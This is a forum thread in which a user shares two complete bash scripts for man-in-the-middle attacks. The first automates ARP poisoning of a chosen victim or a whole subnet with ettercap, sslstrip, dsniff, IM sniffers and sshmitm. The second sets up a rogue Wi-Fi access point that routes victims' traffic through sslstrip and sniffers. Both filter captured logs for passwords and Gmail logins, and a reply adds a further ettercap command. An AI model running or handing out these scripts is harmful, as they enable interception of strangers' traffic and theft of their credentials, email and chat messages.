Jump to content

Arp Poisoning Script


Junke1990
 Share

Recommended Posts

Hey guys,

Since I was getting tired of doing everything by hand I made a little script to automate the procedure xD

Let me know if something is done wrong or you have suggestions!

#!/bin/bash
# ARP Poisoning
# Created by Junke1990
# Tested with Asus eee 1000h
# 
### required packages ###
# sudo apt-get -y install ettercap python-twisted-web2 dsniff imsniff python
# sslstrip -  google, download, extract and alter path below! 

# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'
logfolder='ARP-logs/'

# Make sure only root can run our script
if [[ $EUID -ne 0 ]]; then
  echo "This script must be run as root" 1>&2
  exit 1
fi


modprobe tun
sleep 1

# get interface and mac list
i=0 iflist=() maclist=()
while read -r if mac; do 
  iflist[i]=$if
  maclist[i]=$mac
  ((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')

for i in "${!iflist[@]}"; do
  echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done
echo -n "Select your interface to ARP poison. [#] "
read j
int=${iflist[j]}

echo -n "IP address of victim: [x.x.x.x]/[a]"
read vic

# info inet conn
int_IP=`ifconfig $int | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
int_gw=`route -n | awk '{ print $2}' |grep -v '0.0.0.0' | sed -n "3 p"`
int_bc=`ifconfig $int | grep 'Bcast:'|cut -d: -f3 | awk '{ print $1}'`

# lowest IP
oct4=`echo ${int_gw} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
oct4=$((oct4+1))
int_a=`echo $int_gw | cut -d. -f1,2,3`
int_a="$int_a.$oct4"

# highest IP
oct4=`echo $int_bc | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
int_b=$((oct4-1))

# range
int_range="$int_a-$int_b"

# determine victim
if [ $vic = "a" ]; then
  vic=$int_range;
fi

# iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# ettercap TCP Ports
# IMAP  - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3  - 110/TCP 995/TCP
# SMTP  - 25/TCP 465/TCP
# SSL   - 443/TCP
# HTTP  - 80/TCP
# SSH   - 22/TCP
# MSN   - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ   - 5190/TCP - nobody at all uses ICQ xD

xterm -e ettercap -T -P autoadd -i $int -L ettercap.log -m ettercap.msg.log -l ettercap.info.log -w ettercap.pcap -M arp /$int_gw/ /$vic/22,25,80,110,143,220,443,465,993,995 &

### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
  xterm -title sslstrip -e python $sslstrip -s -f -k -l 8080 &
  sleep 1
  xterm -e tail -f "sslstrip.log" &
  sleep 1
  xterm -e "tail -f sslstrip.log |grep -i 'pass' "& 

  # filters - not fully tested!
  # xterm -title HYVES -e "tail -f sslstrip.log |grep 'auth_username' | sed 's/.*auth_username=/user=/' | sed 's/\&/ /g' | awk '{print $1 $2}'"&
  # xterm -title GMAIL -e "tail -f sslstrip.log |grep Passwd |  sed 's/.*Email=/Email=/' | sed 's/\&/ /g' | awk '{print $1 $2 }'"&
else 
  echo "sslstrip not found."
  echo 'Edit $sslstrip to the correct path.'
fi

# DSniff
if which dsniff >/dev/null; then
  xterm -e dsniff -i $int -m -w dsniff.log &   
fi

# IMSniff - MSN only
if which imsniff >/dev/null; then
  if [ ! -d 'IMlog' ]; then
    mkdir IMlog
  fi
  # gives a lot of unknown content err's
  xterm -e "imsniff -cd IMlog $int |grep -i -v 'unknown'"& 
fi

# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if which msgsnarf >/dev/null; then
  xterm -e msgsnarf -i $int &   
fi


### SINGLE VICTIM ONLY ###
# SSH mitm
if which sshmitm >/dev/null; then
  if [ $vic != "a" ]; then
    xterm -e sshmitm -I $vic &   
  fi
fi

# ip_forward
# as last to avoid reset
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
  echo "Can't enable ip_forward"
fi

edit: updated the script

Edited by Junke1990
Link to comment
Share on other sites

  • 1 month later...

god damnit, i made one too around the same time but posted it a few weeks after, hehe

http://www.hak5.org/forums/index.php?showtopic=16158

my ettercap command is rather standard, just

ettercap -T -i interface -q -M arp:remote /gateway/ /target/

do you know off the top of your head if that command monitors all ports by default? you've specified a lot in your script so i guess mine only monitors port 80. ill have to look into it

Link to comment
Share on other sites

I honestly don't know, I'm not that big of an expert when it comes to ettercap. I did update the script to make it easier. But it is still a work in progress.

I have a Soft AP script to if you want I can put it up here to, it is based on this one but has a few other feature since you are actually in the middle of the traffic.

Link to comment
Share on other sites

If you have any sugestions please let me know!

#!/bin/bash
# SoftAP for wireless-testing
# Created/Modded by Junke1990
#
# Hardware: Eee PC 1000h 
# NICs
#  eth0     (LAN)  
#  ra0         (WLAN)        rt2860STA
#  wlan1     (USB WLAN)    RTL8170L    # dealextreme sku.27963 

# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'

# services
dsn=0 # Dsniff
ims=0 # IMsniff
msg=0 # MSGsnarf
url=0 # URLsnarf

ssllog1=0 # tail sslstrip.log
ssllog2=0 # tail sslstrip.log |grep pass

# Make sure only root can run our script
if [[ $EUID -ne 0 ]]; then
  echo "This script must be run as root" 1>&2
  exit 1
fi

modprobe tun
sleep 1

echo "[>] Starting: Soft AP - Junke1990"
# get interface and mac list
i=0 iflist=() maclist=()
while read -r if mac; do 
  iflist[i]=$if
  maclist[i]=$mac
  ((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')

for i in "${!iflist[@]}"; do
  echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done
echo -n "[?] Select your inet conn. [#] "
read j
intI=${iflist[j]}

# select SoftAP adapter
for i in "${!iflist[@]}"; do
  if [ $j != $i ]; then
    echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
  fi
done
echo -n "[?] Select your SoftAP adapter. [#] "
read j
intAP=${iflist[j]}

# MAC address
intAP_MAC=${maclist[j]}

echo "[+] Gathering network info..."
# info inet conn
intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'`
intI_gw=`route -n | awk '{ print $2}' | grep -v '0.0.0.0' | sed -n "3 p"`
intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '0.0.0.0' | awk '{ print $4}' | cut -d: -f2`
intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1`

# converting netmask in to netmask length
echo "[+] Calc'ing network mask..."
NETMASK=$intI_mask
MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'`
MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'`
MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'`
MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`

BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`

MASK=$(( BM1 + BM2 + BM3 + BM4))
intI_mask_nb=$MASK

# enter wireless essid name
echo -n "[?] Enter the desired name for wireless network: "; read ssid

# prepare interface / softap
#wlanconfig $intAP destroy
#wlanconfig $intAP create wlanmode mon wlandev wifi0
if [ `echo $intAP || grep 'mon' ` ]; then
 intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`;
fi

echo "[+] Setting up fake AP...";
sleep 1;
# to enable wep add: -W 1 -w "1234567890" -a $intAP_MAC
xterm -geometry 75x15 -e airbase-ng -c 6 -e "$ssid" $intAP &
sleep 1;
ifconfig at0 up
ifconfig at0 192.168.3.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net $intI_netw netmask $intI_mask gw $intI_gw
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1

# monitor
#xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP &
#xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3

echo "[+] Killing dhcpd..."
# do this quiet for when the process isn't running
killall -q dhcpd3

echo "[+] Setting up DHCP config..."
# create custom dhcpd.conf for WLAN
DHCPDCONF='';
cat > dhcpd.conf << EOF
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.3.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.3.255;
option routers 192.168.3.1;
EOF

### Submitted by ToomSec
for d in $(cat /etc/resolv.conf | sed -r 's/^.* ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*$/\1/' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
  do
      echo "option domain-name-servers $d;" >> dhcpd.conf
  done

cat >> dhcpd.conf << EOF
range 192.168.3.10 192.168.3.254;
}
EOF

echo "[+] Cleaning up IP tables..."
# iptables cleanup
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Setting up forwarding tables..."
# iptables
#iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic
#iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080  # send stuff to sslstrip
iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway
iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router
#iptables -t nat -A PREROUTING -s 192.168.3.0/24 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN
# ip fwd enable 
echo 1 > /proc/sys/net/ipv4/ip_forward

# start dhcp server for subnet
# edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied
echo "[+] Setting up DHCP server..."
xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &

### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
  echo "[+] Setting up sslstrip..."
  xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 &
  if [ $ssllog1 == 1 ]; then xterm -e tail -f sslstrip.log & fi
  if [ $ssllog2 == 1 ]; then xterm -e "tail -f sslstrip.log |grep 'pass' "& fi
  sleep 1
else 
  echo "[-] SSLStrip not found..."
  echo 'Edit $sslstrip to the correct path.'
fi


# DSniff
if [ $dsn == 1 ]; then 
  if which dsniff >/dev/null; then
    echo "[+] Setting up dsniff..."
    xterm -e dsniff -i at0 -m &   
    sleep 1
  fi
fi

# IMSniff - MSN only
if [ $ims == 1 ]; then 
  if which imsniff >/dev/null; then
    echo "[+] Setting up IMSniff..."
    if [ ! -d 'IMlog' ]; then
      mkdir IMlog
    fi
    # gives a lot of unknown content err's
    xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"& 
    sleep 1
  fi
fi

# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if [ $msg == 1 ]; then 
  if which msgsnarf >/dev/null; then
    echo "[+] Setting up MSGsnarf..."
    xterm -e msgsnarf -i at0 &    
    sleep 1
  fi
fi

# URLSnarf
if [ $url == 1 ]; then
  if which urlsnarf >/dev/null; then
    echo "[+] Setting up URLsnarf..."
    xterm -e urlsnarf -i at0 &
    sleep 1
  fi
fi

# ettercap TCP Ports
# IMAP  - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3  - 110/TCP 995/TCP
# SMTP  - 25/TCP 465/TCP
# SSL   - 443/TCP
# HTTP  - 80/TCP
# SSH   - 22/TCP
# MSN   - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ   - 5190/TCP - nobody at all uses ICQ xD

echo "[+] Setting up ettercap..."
#xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp /192.168.3.1/ /192.168.3.10-254/22,25,80,110,143,220,443,465,993,995,1863 &

### Submitted by ToomSec
#ettercap -T -q -p -u -z -m ${LOGFOLDER}ettercap_evilap.log -i $wint >> $LOGFILE 2>&1
xterm -e ettercap -T -q -p -u -z -m ettercap_evilap.log -i at0 &
sleep 1

# ip_forward
# as last to avoid reset
echo "[+] Enabling IP forward..."
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
  echo "[-] Can NOT enable ip_forward..."
fi

echo "[x] All done! have fun!"

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...